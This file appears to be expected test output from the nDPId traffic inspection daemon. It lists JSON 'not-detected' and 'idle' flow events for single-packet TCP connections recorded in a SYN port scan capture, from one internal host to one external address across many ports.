-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058346,"flow_last_seen":1278275058346,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058470,"flow_last_seen":1278275058470,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6543,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":638,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059516,"flow_last_seen":1278275059516,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":699,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6547,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1385,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":406,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060694,"flow_last_seen":1278275060694,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":407,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060286,"flow_last_seen":1278275060286,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060388,"flow_last_seen":1278275060388,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060177,"flow_last_seen":1278275060177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1149,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060285,"flow_last_seen":1278275060285,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":22939,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1318,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060491,"flow_last_seen":1278275060491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1379,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":416,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1431,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060641,"flow_last_seen":1278275060641,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6565,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1334,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1411,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":204,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":425,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 